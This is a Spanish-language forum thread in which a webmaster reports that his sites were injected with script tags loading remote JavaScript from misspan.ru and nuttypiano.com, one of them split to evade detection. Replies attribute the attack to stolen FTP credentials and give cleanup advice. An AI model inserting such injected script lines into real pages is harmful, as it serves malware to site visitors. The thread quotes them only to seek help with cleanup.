Problemas de seguridad

No sé si este sea un buen lugar para exponer esto, pero siempre el foro me ayudó mucho, por eso recurro a ustedes.

Varios de mis sitios han sido infiltrados con un código como el siguiente en sus páginas:

Código :

<script type="text/javascript" src="http://misspan.ru/Native_File.js"></script>
<!--ad0b59bcc67b59250a4a9c29817e4ad5-->

Asimismo, los archivos .js de mis sitios aparecieron con este otro código:

Código :

document.write('<sc'+'ript type="text/javascript" src="http://nuttypiano.com/Native_File.js"></scri'+'pt>');

El efecto inmediato no se hizo esperar y Google ha marcado como dañinos varios de mis sitios.

En algunos de los sitios dañados tengo instalado el FCKEditor, en otros Joomla 1.5 e, incluso, hay uno que es sólo HTML y también fue infectado.

Si bien ya limpié los sitios y cambié contraseñas, temo que pueda repetirse un ataque de esos.

Agradecería cualquier orientación acerca de las causas de este problema.

Omar.

Si han conseguido vulnerar el servidor no hay nada que puedas hacer. Mientras tanto puedes hacer lo siguiente: no guardes las contraseñas de FTP en cualquiera sea el problema de FTP que estés usando. Sé que es una molestia teclear las contraseñas pero créeme que es una buena medida de seguridad. Algunos virus saben cómo leer los archivos de configuración del FileZila o CuteFTP y quién sabe qué otros programas más y usan los datos de login para infectar cuentas de hosting.
Huelga decir que debes verificar que no tengas "bichos" en tus máquinas .

Tienes toda la razón. Encontré info asociada al tipo de infección que sufrí y dan consejos parecidos. Al parecer se trata de virus que infectan la propia máquina y buscan claves FTP, una vez obtenidas, empiezan a enviar esos datos a otro sitio que es el encargado de infiltrarse e inyectar los códigos maliciosos. Los pasos a seguir:

1) Cambiar todas las contraseñas;
2) Borrarlas de los programas de FTP;
3) Pasar varios antivirus a la propia PC.